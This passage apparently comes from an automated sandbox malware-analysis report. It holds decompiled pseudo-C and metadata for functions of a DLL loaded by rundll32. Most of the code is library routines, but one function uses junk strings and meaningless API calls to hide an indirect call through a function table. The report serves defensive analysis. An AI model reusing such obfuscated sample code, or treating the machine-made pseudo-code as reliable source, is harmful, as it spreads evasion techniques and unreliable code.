						_t35 = E1000E58E(_t40);
					}
					return E1001FC9C(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E10020F40(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1003720c;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x10048668 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x10048668 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E1001FBB5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}






















                                                                                                            0x10006879
                                                                                                            0x10006883
                                                                                                            0x1000688a
                                                                                                            0x1000688e
                                                                                                            0x1000688f
                                                                                                            0x10006890
                                                                                                            0x10006896
                                                                                                            0x1000689f
                                                                                                            0x100068a2
                                                                                                            0x100068a5
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x100068b1
                                                                                                            0x100068b4
                                                                                                            0x100068b8
                                                                                                            0x100068b8
                                                                                                            0x100068b9
                                                                                                            0x100068bc
                                                                                                            0x100068bd
                                                                                                            0x100068bf
                                                                                                            0x100068c2
                                                                                                            0x100068c7
                                                                                                            0x100068cb
                                                                                                            0x100068ce
                                                                                                            0x100068d0
                                                                                                            0x100068d5
                                                                                                            0x100068d9
                                                                                                            0x100068d9
                                                                                                            0x100068dc
                                                                                                            0x100068df
                                                                                                            0x100068e1
                                                                                                            0x100068e1
                                                                                                            0x100068f2
                                                                                                            0x100068fa
                                                                                                            0x10006902
                                                                                                            0x10006905
                                                                                                            0x10006908
                                                                                                            0x1000690c
                                                                                                            0x10006911
                                                                                                            0x10006914
                                                                                                            0x1000691b
                                                                                                            0x1000691b
                                                                                                            0x1000691f
                                                                                                            0x10006921
                                                                                                            0x10006924
                                                                                                            0x10006928
                                                                                                            0x1000692b
                                                                                                            0x1000692d
                                                                                                            0x10006930
                                                                                                            0x10006933
                                                                                                            0x10006933
                                                                                                            0x10006933
                                                                                                            0x10006938
                                                                                                            0x10006944
                                                                                                            0x1000694c
                                                                                                            0x1000694d
                                                                                                            0x1000694e
                                                                                                            0x10006953
                                                                                                            0x10006954
                                                                                                            0x1000695c
                                                                                                            0x10006962
                                                                                                            0x10006962
                                                                                                            0x10006967
                                                                                                            0x1000696a
                                                                                                            0x1000696c
                                                                                                            0x10006971
                                                                                                            0x10006974
                                                                                                            0x10006974
                                                                                                            0x10006975
                                                                                                            0x10006975

                                                                                                            APIs
                                                                                                            • GetMenuCheckMarkDimensions.USER32 ref: 10006890
                                                                                                            • _memset.LIBCMT ref: 100068F2
                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10006944
                                                                                                            • LoadBitmapA.USER32 ref: 1000695C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4271682439-3916222277
                                                                                                            • Opcode ID: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
                                                                                                            • Instruction ID: 7502f03d00862ab63d890e742e6b2e485ad896773ebef231c484e9e01049f3a3
                                                                                                            • Opcode Fuzzy Hash: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
                                                                                                            • Instruction Fuzzy Hash: 9E31C572A0025A9FFF10CFB8CDC5AAE7BA5EF48384F25452AE906EB195DA309944C750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10002863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10002863(intOrPtr* _a4) {
				int _v4;
				intOrPtr _v8;
				intOrPtr* _t26;
				short* _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				short* _t36;

				_t32 = L"xadqsavcbdfewescGADW";
				_t36 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v8 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9);
				_t33 =  *_a4 + 0xc0 + (_v4 + GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9)) *  *0x100440dc * 8;
				if( *_t33 != 0) {
					_t35 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t36, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *_t33 + _v8 + 0xc));
					if(_t35 != 0) {
						while(1) {
							_t26 =  *_t35;
							if(_t26 == 0) {
								goto L5;
							}
							 *_t26(_v8, 1, 0);
							_t35 = _t35 + 4;
						}
					}
				}
				L5:
				return 1;
			}










                                                                                                            0x1000287b
                                                                                                            0x10002883
                                                                                                            0x10002891
                                                                                                            0x100028a3
                                                                                                            0x100028bc
                                                                                                            0x100028c7
                                                                                                            0x100028e6
                                                                                                            0x100028eb
                                                                                                            0x100028fc
                                                                                                            0x100028fc
                                                                                                            0x10002900
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100028f7
                                                                                                            0x100028f9
                                                                                                            0x100028f9
                                                                                                            0x100028fc
                                                                                                            0x100028eb
                                                                                                            0x10002904
                                                                                                            0x1000290b

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002895
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100028A7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100028D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
                                                                                                            • Instruction ID: af9e15b59c393e0d8099aaf98a9213ea7197e89f84b9fb059b6d85f6975e4071
                                                                                                            • Opcode Fuzzy Hash: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
                                                                                                            • Instruction Fuzzy Hash: 7811BFB1604319BFE700DB55CC89F17BBECEB89754F12441AFA40EB291C771AC008B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007AB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10007AB6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10008D3D(__ecx, __eflags, _t26) == 0) {
					_t10 = E1000B1DD(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10009199(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E1001113D(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













                                                                                                            0x10007ab6
                                                                                                            0x10007ab6
                                                                                                            0x10007ab8
                                                                                                            0x10007abd
                                                                                                            0x10007ac6
                                                                                                            0x10007acf
                                                                                                            0x10007ad4
                                                                                                            0x10007ad6
                                                                                                            0x10007ae2
                                                                                                            0x10007ae2
                                                                                                            0x10007ae9
                                                                                                            0x10007b44
                                                                                                            0x00000000
                                                                                                            0x10007b47
                                                                                                            0x10007aeb
                                                                                                            0x10007aee
                                                                                                            0x10007af1
                                                                                                            0x10007af8
                                                                                                            0x10007b02
                                                                                                            0x10007b04
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007b0d
                                                                                                            0x10007b12
                                                                                                            0x10007b14
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007b1b
                                                                                                            0x10007b21
                                                                                                            0x10007b23
                                                                                                            0x10007b30
                                                                                                            0x10007b3c
                                                                                                            0x00000000
                                                                                                            0x10007b3c
                                                                                                            0x10007b26
                                                                                                            0x10007b2c
                                                                                                            0x10007b2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007b2e
                                                                                                            0x10007af3
                                                                                                            0x10007af6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007af6
                                                                                                            0x10007ad8
                                                                                                            0x10007adc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007ade
                                                                                                            0x10007ac8
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Edit
                                                                                                            • API String ID: 0-554135844
                                                                                                            • Opcode ID: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
                                                                                                            • Instruction ID: c236510ebf9aa878e60991b13e4b4610bd432db7ec560ce308cb7ed9e00e23a0
                                                                                                            • Opcode Fuzzy Hash: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
                                                                                                            • Instruction Fuzzy Hash: 1301AD30B00252AEFA52D6208C44F4EF7A9FF457D5F104529F54AD60BACB68E860C621
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100143C9 Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E100143C9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1001FBC4(E10033F57, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x10014589) & 0x000000ff) * 4 +  &M10014561))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E10014A76( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10004C10(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E100100ED(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E10010141(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1001370D( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E10014290(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E1000AE99(__ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E10001260( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E1001FC9C(_t56);
			}






                                                                                                            0x100143c9
                                                                                                            0x100143d0
                                                                                                            0x100143da
                                                                                                            0x100143e3
                                                                                                            0x10014556
                                                                                                            0x10014556
                                                                                                            0x100143e9
                                                                                                            0x100143f0
                                                                                                            0x00000000
                                                                                                            0x10014416
                                                                                                            0x10014419
                                                                                                            0x1001441e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100143f7
                                                                                                            0x100143fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144ca
                                                                                                            0x100144cd
                                                                                                            0x100144d0
                                                                                                            0x100144d5
                                                                                                            0x100144da
                                                                                                            0x100144dc
                                                                                                            0x100144de
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001440c
                                                                                                            0x1001440f
                                                                                                            0x100143ff
                                                                                                            0x100143ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014532
                                                                                                            0x10014538
                                                                                                            0x1001453b
                                                                                                            0x10014545
                                                                                                            0x10014548
                                                                                                            0x1001454f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144e7
                                                                                                            0x100144ea
                                                                                                            0x100144ef
                                                                                                            0x100144f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014426
                                                                                                            0x1001442a
                                                                                                            0x1001442c
                                                                                                            0x1001442f
                                                                                                            0x10014432
                                                                                                            0x10014448
                                                                                                            0x1001445a
                                                                                                            0x1001445d
                                                                                                            0x10014463
                                                                                                            0x10014466
                                                                                                            0x10014469
                                                                                                            0x10014469
                                                                                                            0x1001446e
                                                                                                            0x10014474
                                                                                                            0x10014477
                                                                                                            0x1001447c
                                                                                                            0x10014483
                                                                                                            0x1001447e
                                                                                                            0x1001447e
                                                                                                            0x1001447e
                                                                                                            0x10014486
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001448e
                                                                                                            0x10014492
                                                                                                            0x100144ae
                                                                                                            0x100144ae
                                                                                                            0x100144b1
                                                                                                            0x100144b6
                                                                                                            0x100144b9
                                                                                                            0x100144bb
                                                                                                            0x100144bc
                                                                                                            0x100144bf
                                                                                                            0x100144c2
                                                                                                            0x00000000
                                                                                                            0x10014494
                                                                                                            0x10014494
                                                                                                            0x10014497
                                                                                                            0x1001449d
                                                                                                            0x1001449f
                                                                                                            0x100144a4
                                                                                                            0x100144a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144fd
                                                                                                            0x10014503
                                                                                                            0x10014506
                                                                                                            0x1001450b
                                                                                                            0x1001450b
                                                                                                            0x1001450b
                                                                                                            0x1001450f
                                                                                                            0x1001450f
                                                                                                            0x10014512
                                                                                                            0x10014515
                                                                                                            0x1001451a
                                                                                                            0x1001451f
                                                                                                            0x10014522
                                                                                                            0x10014525
                                                                                                            0x10014528
                                                                                                            0x10014404
                                                                                                            0x10014406
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100143f0
                                                                                                            0x10014558
                                                                                                            0x1001455d

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 100143D0
                                                                                                            • SendMessageA.USER32(?,00000138,?,?), ref: 10014448
                                                                                                            • GetBkColor.GDI32(?), ref: 10014451
                                                                                                            • GetTextColor.GDI32(?), ref: 1001445D
                                                                                                            • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 100144EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 187318432-0
                                                                                                            • Opcode ID: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
                                                                                                            • Instruction ID: aaf9ea3742fe6bc6e7247e3e7f83f19f993380783e2d83981db4afd0f75aeedd
                                                                                                            • Opcode Fuzzy Hash: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
                                                                                                            • Instruction Fuzzy Hash: 1541457450074ADFCB20CF64C884A9EB3B0FF08310B128919F89A9F2B2DB74E890DB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100071AD Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E100071AD(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10045580; // 0x6a53a566
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E1001FBF7(E1003305F, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E1000563B(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E100071AD(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10001260( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E1001FBB5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}
















                                                                                                            0x100071ad
                                                                                                            0x100071b4
                                                                                                            0x100071b8
                                                                                                            0x100071bf
                                                                                                            0x100071c5
                                                                                                            0x100071cc
                                                                                                            0x100071d1
                                                                                                            0x100071d9
                                                                                                            0x100071df
                                                                                                            0x100071e5
                                                                                                            0x100071e8
                                                                                                            0x100071eb
                                                                                                            0x100071f1
                                                                                                            0x100071f5
                                                                                                            0x100071fb
                                                                                                            0x10007209
                                                                                                            0x1000720f
                                                                                                            0x10007211
                                                                                                            0x10007213
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007215
                                                                                                            0x1000721b
                                                                                                            0x1000721f
                                                                                                            0x1000722b
                                                                                                            0x10007237
                                                                                                            0x1000723b
                                                                                                            0x10007241
                                                                                                            0x10007245
                                                                                                            0x1000724c
                                                                                                            0x1000724e
                                                                                                            0x00000000
                                                                                                            0x1000724e
                                                                                                            0x00000000
                                                                                                            0x1000724c
                                                                                                            0x1000726f
                                                                                                            0x10007275
                                                                                                            0x1000727f
                                                                                                            0x1000728a
                                                                                                            0x10007277
                                                                                                            0x10007277
                                                                                                            0x1000727d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000727d
                                                                                                            0x1000728f
                                                                                                            0x1000728f
                                                                                                            0x1000729a
                                                                                                            0x100072a2
                                                                                                            0x100072a3
                                                                                                            0x100072a4
                                                                                                            0x100072ad
                                                                                                            0x100072b2
                                                                                                            0x100072b9

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100071CC
